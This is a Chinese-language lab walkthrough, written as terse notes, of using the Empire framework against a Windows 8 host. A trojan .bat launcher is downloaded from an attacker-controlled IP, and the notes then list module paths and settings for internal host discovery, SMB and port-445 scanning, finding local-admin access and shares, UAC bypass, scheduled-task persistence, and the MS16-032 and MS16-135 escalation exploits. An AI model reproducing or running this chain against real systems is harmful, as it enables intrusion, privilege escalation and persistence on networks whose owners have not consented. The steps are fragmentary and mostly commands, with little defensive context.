在window8浏览器中输入http://192.168.0.111/launcher.bat
下载kail生成的木马bat文件
打开bat文件就有一个代理过来了
因为现在间隔是5秒钟,我们把它设置为零
1.主机发现
arp扫描
situational_awareness/network/arpscan
set Range 192.168.0.1-192.168.0.100
execute
扫描出内网ip
同样方法进行smb扫描
network/smbscanner
2.端口扫描
usemodule situational_awareness/network/portscan
参数配置
设置扫的主机ip192.168.0.133 要保证ping的通
然后看看信息info 参数配置:
这里主要是设置445端口
然后看参数的设置信息可知主要是扫445端口开放的主机
执行端口扫描
执行结果
3.查找本地管理员的主机
situational_awareness/network/powerview/find_localadmin_access
然后info查看信息
4.查看共享文件
situational_awareness/network/powerview/share_finder
5.本地信息收集
situational_awareness/host/winenum
- 提权
bypassuac
privesc/bypassuac
扫描环境向量提权
privesc/powerup/allchecks
计划任务system提权
persistence/elevated/schtasks
set Listener test
首先开个代理
然后info,查看参数
设置某时间开始执行,然后设置监听器,进行执行
返回
溢出提权漏洞
powershell/privesc/ms16-032
powershell/privesc/ms16-135
设置监听器让它执行